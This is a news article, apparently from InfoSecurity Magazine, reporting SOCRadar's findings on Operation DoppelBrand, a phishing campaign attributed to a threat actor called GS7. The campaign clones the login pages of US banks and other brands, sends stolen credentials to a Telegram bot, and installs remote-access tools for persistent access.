Operation DoppelBrand: How Hackers Hijack Trusted Brands to Steal Your Data

A sophisticated and highly automated phishing campaign has been targeting some of the world’s largest financial and technology corporations, according to a recent cybersecurity investigation. Dubbed Operation DoppelBrand, this extensive effort focuses on impersonating trusted brands to steal sensitive user credentials and gain long-term access to corporate systems. The campaign, which researchers have linked to a threat actor known as GS7, leverages a vast network of counterfeit websites designed to look identical to legitimate online portals for banking, insurance, and tech services.

Security analysts at SOCRadar tracked the campaign’s latest wave, which primarily targeted Fortune 500 companies like Wells Fargo and USAA between late 2025 and early 2026. The operation’s infrastructure, however, shows connections to activity dating back to 2022. The attackers use a combination of phishing emails and cloned login pages to trick victims. These fake pages are remarkably convincing, copying logos, styling, and form layouts from the real sites. In some instances, users are even funneled through a fake OneDrive interface before landing on the spoofed banking portal.

The scale of the operation is significant, with researchers identifying over 150 domains directly tied to this activity and nearly 200 more showing similar suspicious characteristics. To maintain this sprawling network, the attackers rely on automation and short-lived infrastructure. They frequently use registrars like Namecheap and OwnRegistrar, host domains through Cloudflare, and obtain SSL certificates within hours of registering a new domain. Common hallmarks include domains registered for one-year terms, automated certificates from Let’s Encrypt, and wildcard DNS records that allow for the rapid creation of brand-specific subdomains.

Once a victim enters their login information on one of these fake pages, the stolen data is not just collected, it is actively processed. Credentials, along with the user’s IP address, geolocation, and device details, are automatically transmitted to a Telegram bot controlled by the attackers. This allows the threat actor to sift through the stolen data, filtering and prioritizing high-value targets for further exploitation.

The campaign’s objectives extend far beyond simple credential theft. After compromising an account, the attackers often deploy legitimate remote management tools, such as LogMeIn Resolve, to establish persistent, unattended access to the victim’s system. These tools are typically delivered as MSI files, accompanied by small VBS scripts that handle installation, privilege escalation, and the removal of traces. This move suggests the threat actor is acting as an initial access broker, securing a foothold in corporate networks which can then be sold or transferred to other criminal affiliates for further monetization.

In a direct communication with investigators, an individual claiming to be GS7 stated they had been operating for approximately a decade and provided screenshots of phishing control panels. Financial analysis supports the monetization angle; a cryptocurrency wallet shared during the investigation had received around 0.28 BTC, valued between $25,000 and $32,000 at the time.

The primary targets remain major U.S. financial institutions, investment firms, and insurance providers, with global technology and healthcare brands also in the crosshairs. The majority of the observed phishing activity is concentrated in English-speaking markets, particularly the United States and Western Europe, highlighting the campaign’s focus on high-value economic sectors.

(Source: InfoSecurity Magazine)